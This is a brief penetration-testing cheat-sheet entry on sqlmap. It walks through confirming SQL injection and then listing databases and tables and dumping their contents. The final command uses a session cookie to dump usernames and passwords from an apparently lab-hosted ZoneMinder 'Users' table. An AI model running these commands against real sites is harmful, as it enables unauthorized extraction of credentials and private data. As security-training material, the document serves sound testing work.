SQL Injection with sqlmap
exploitationtool
Summary
Automates SQL injection detection and data extraction; feed it a saved request with -r or a URL with -u, then drill from databases to tables to columns.
Walkthrough
Use sqlmap to confirm and exploit SQL injection, then progressively extract data from the backend database.
Steps
- Run from a saved request (
-r req.txt) or a URL (-u); raise--level/--riskto test more injection points. - List databases with
--dbs, then tables in one with-D <database_name> --tables. - Dump an entire database with
--dump, or target a single table with-T <table_name>. - Narrow extraction with
-Cfor specific columns and--whereto filter rows; pass--cookiefor authenticated endpoints.
Commands
bash
sqlmap -r req.txt --batch --level 3 --risk 2
bash
sqlmap -u "http://<TARGET>/view?request=event&action=removetag&tid=1" --dbs
bash
sqlmap -u "http://<TARGET>/view?request=event&action=removetag&tid=1" -D <database_name> --tables
bash
sqlmap -u "http://<TARGET>/view?request=event&action=removetag&tid=1" -D <database_name> --dump
bash
sqlmap -u "http://<TARGET>/view?request=event&action=removetag&tid=1" -D <database_name> -T <table_name> --dump
bash
sqlmap -u "http://<TARGET>/zm/index.php?view=request&request=event&action=removetag&tid=1" \ --cookie="ZMSESSID=6lkqf49jhdfdo1l4nplp9m9o5" \ -D zm -T Users -C Username,Password \ --where="Username='mark'" \ --dump --threads 10 --batch